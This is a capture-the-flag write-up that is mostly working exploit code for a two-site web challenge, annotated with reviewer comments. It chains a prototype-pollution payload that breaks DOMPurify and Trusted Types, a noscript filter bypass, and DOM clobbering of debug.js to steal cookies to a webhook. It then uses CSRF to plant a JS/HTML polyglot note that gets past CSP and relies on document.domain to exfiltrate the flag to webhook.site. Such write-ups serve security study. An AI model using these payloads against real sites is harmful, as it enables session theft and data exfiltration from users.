I was inspired to write this challenge while playing a challenge by @53c0nd-2473.
- Overwrite `Object.getOwnPropertyNames` through the "nice feature" (a prototype-pollution sink: the payload walks `__proto__.__proto__.constructor` to reach `Object` itself) to bypass DOMPurify + Trusted Types.
{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
- Bypass the custom filter with a `noscript` tag: with scripting enabled the browser treats everything up to the closing `</noscript>` as raw text, which the custom filter apparently parses differently, so the real tag is only seen by the browser. Example: `<noscript><img src="</noscript><img src=1 onerror=alert()">`
- Steal cookies using `debug.js`: DOM-clobber the values it reads so that it sets the parent's `name` to the cookies, then redirect with a meta tag to your webhook, which receives `window.name`.
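// Stage 1: build the link for the first site (sosafewebsite).
//
//  ?wow=  -> prototype-pollution payload. It walks __proto__.__proto__ to reach
//            Object.prototype.constructor (i.e. Object) and overwrites
//            Object.getOwnPropertyNames with a string, which the notes above say
//            is enough to break DOMPurify / Trusted Types on this target.
//  ?name= -> HTML injection that survives the site's custom filter by hiding
//            the real markup inside a <noscript> block (see the notes above).
//
// Quoting: the injected fragment sits inside srcdoc='...' and then inside two
// more nested srcdoc="..." attributes.  Each srcdoc level HTML-decodes its
// attribute value once, so a double quote that has to survive k levels must
// be encoded k times: &quot; -> &amp;quot; -> &amp;amp;quot;.
// NOTE(review): the published listing shows `"""` for the first replace (a
// syntax error) and one `amp;` fewer on the other two; that is exactly what
// one pass of entity-decoding by the page renderer would produce, so the three
// levels are reconstructed here -- confirm against the original post.

// Kept as a literal string on purpose: in an object literal `__proto__:` sets
// the prototype instead of creating an own key, so JSON.stringify would drop it.
const ppPayload = '{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}';

// Remove the layout whitespace from a multi-line template.
const stripWhitespace = (s) => s.replace(/\n/g, "").replace(/ /g, "").replace(/\t/g, "");

// Encode every double quote for the srcdoc nesting depth the fragment lives at
// (depth 1 -> &quot;, depth 2 -> &amp;quot;, depth 3 -> &amp;amp;quot;).
const quoteAtDepth = (html, depth) => html.replace(/"/g, "&" + "amp;".repeat(depth - 1) + "quot;");

// Outer injection: an img whose id attribute swallows the </noscript>, then the
// real payload (srcdoc iframe + meta refresh to the webhook).
let customFilterBypass = stripWhitespace(`
<noscript>
<img/id="
</noscript><img><iframe/srcdoc='HTMLINJ'></iframe><meta/http-equiv='refresh'/content='1;url=https://webhook.site/6-b79f993da3a' />
">
</noscript>`);

// Depth 1 (inside the srcdoc='...' iframe): load the site's debug.js next to a
// frame named "debugOptions".  The notes above say this drives debug.js into
// copying document.cookie into parent.name; the exact lookups it performs are
// not visible here.
let domclobbering = quoteAtDepth(`
<iframe srcdoc="NEXT" name="debugOptions"></iframe><link href="/ff" rel="stylesheet"><link href="/qqq" rel="stylesheet"><link href="/ffds" rel="stylesheet"><link href="/df" rel="stylesheet"><script src="/js/debug.js"></script>
`, 1);

// Depth 2: debugOptions[0] -> a frame named "0".
domclobbering = domclobbering.replace("NEXT", quoteAtDepth(`
<iframe srcdoc="NEXT" name="0"></iframe>
`, 2));

// Depth 3: elements with ids 0..3 whose attributes spell out
// parent / name / document / cookie for the clobbered lookups.
domclobbering = domclobbering.replace("NEXT", quoteAtDepth(`
<br id="0" clear="parent"><font id="1" face="name"><object id="2" code="document"></object><input id="3" accept="cookie">
`, 3));

// Drop the fragment into the outer srcdoc, then turn every remaining space into
// "/" (a valid separator between tag name and attributes) so the payload has
// no whitespace at all.
customFilterBypass = customFilterBypass.replace("HTMLINJ", domclobbering).replace(/\n/g, "").replace(/ /g, "/");

console.log(`http://sosafewebsite.peykar.io:7070/?name=${encodeURIComponent(customFilterBypass)}&wow=${encodeURIComponent(ppPayload)}`);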
- CSRF to add note
- Bypass CSP on the notes website by making the note a JS/HTML polyglot: the same file is valid both as a script and as an HTML page, so the page can load itself with `<script src>`.
// Note body that is valid JavaScript AND valid HTML (a polyglot):
//  - fetched as a script it runs alert(); the template literal below is an
//    unused string expression and is ignored;
//  - rendered as an HTML page, the script tag inside the literal loads this
//    same URL as a script, which presumably is what the notes site's CSP
//    still allows (same-origin script) -- the CSP itself is not shown here.
// NOTE(review): "/self" presumably stands for the note's own URL; the exploit
// below uses "/note" -- confirm which path the notes site serves.
alert();
`
<script src="/self">
</script>
`
- Make the main website same-origin with the note website by supplying `document.domain=document.domain` as the "feature" (setting `document.domain`, even to its current value, switches the page to domain-only origin checks, so the port no longer matters), then use the main domain's `fetch` to grab the flag. Exploit:
<html>
<head>
</head>
<body>
<script>
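// Attack configuration: `domain` is the bare host both sites share (used for
// document.domain), `main` is the main site's origin, `webhook` is where the
// flag is sent.  Stored on window so the payload strings below can read it.
window.target = {domain : "139.162.238.54", main : "http://139.162.238.54:9090",webhook:"https://webhook.site/-b79b-8005f993da3a"};
// This page is opened several times (popups / navigations); window.name tells
// each instance which step it is.  NOTE: `status` collides with the built-in
// window.status property, which only ever holds a string -- harmless here, but
// a less overloaded name would avoid the collision.
// The unused `var t = 8;` from the original was dropped.
var status = window.name;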
// Build the HTML that makes the notes site execute the note as a script: an
// iframe whose srcdoc pulls ${target.main}/note through a script tag.  A real
// element is created and serialized via outerHTML so the browser handles the
// attribute quoting; the "\/" in the closing tag keeps the literal from
// terminating the enclosing inline script.
function getIncludeScriptPayload(){
  const loader = Object.assign(document.createElement("iframe"), {
    srcdoc: `<script src=${target.main}/note><\/script>`,
  });
  return loader.outerHTML;
}
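// Step 2 (runs in the popup named "csrf_note_include_script"): CSRF a note
// onto the main site.  The note is a JS/HTML polyglot: the JS part sets
// document.domain and exfiltrates /flag through the opener chain, and the
// trailing template literal holds the iframe markup that loads the note as a
// script once the note is rendered as HTML.
if (status === "csrf_note_include_script") {
  const form = document.createElement("form");
  form.id = "csrfForm";
  form.method = "POST";
  form.action = target.main + "/note";
  const inp = document.createElement("input");
  // parent.parent is the notes page hosting the srcdoc iframe; its opener is
  // the "start_attack" popup, which by then sits on the main site with the
  // document.domain "feature" applied, so fetch("/flag") runs as that origin.
  // The 1 s delay presumably gives that popup time to finish navigating.
  // FIX: the original passed the space-stripping pattern as extra arguments to
  // a single replace() call, which silently ignores them; chain it instead.
  const jspayload = `
document.domain="${target.domain}";
setTimeout(()=>{
parent.parent.opener.fetch("/flag",{method:"POST",headers:{"x-i-want":"flag"}}).then(r=>r.text()).then(r=>{
parent.parent.location="${target.webhook}?flag="+r;
});
},1000);
`.replace(/\n/g, "").replace(/ /g, "");
  // JS, then ";`" opens a template literal that swallows the HTML when the
  // note is parsed as a script; the closing backtick ends it.
  inp.value = jspayload + ";`" + getIncludeScriptPayload() + "`";
  inp.name = "note";
  form.appendChild(inp);
  document.body.appendChild(form);
  // Use the element directly instead of relying on the id -> global lookup.
  form.submit();
}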
// Step 1 (runs in the popup named "start_attack"): spawn the CSRF popup, then
// navigate this window to the main site with the "feature" that makes it run
// document.domain=document.domain, so the note's script (which sets
// document.domain to the bare host) can later reach it through opener.
if (status === "start_attack") {
  window.open("?", "csrf_note_include_script");
  document.location.href = `${target.main}?feature=document.domain=document.domain`;
}
// Entry point (also wired to the button): open this same page in a popup whose
// window.name is "start_attack"; that instance carries on with the next step.
function startattack(){
  const nextStep = "start_attack";
  window.open("?", nextStep);
}
// First load (empty window.name) or a numeric name: start automatically.
// The numeric case is presumably for when the page is opened from a frame
// with a numeric name.  Global isNaN() coerces its argument; spelled out here.
if (status === "" || !Number.isNaN(Number(status))) {
  startattack();
}
</script>
<button onclick="startattack()">Attack</button>
</body>
</html>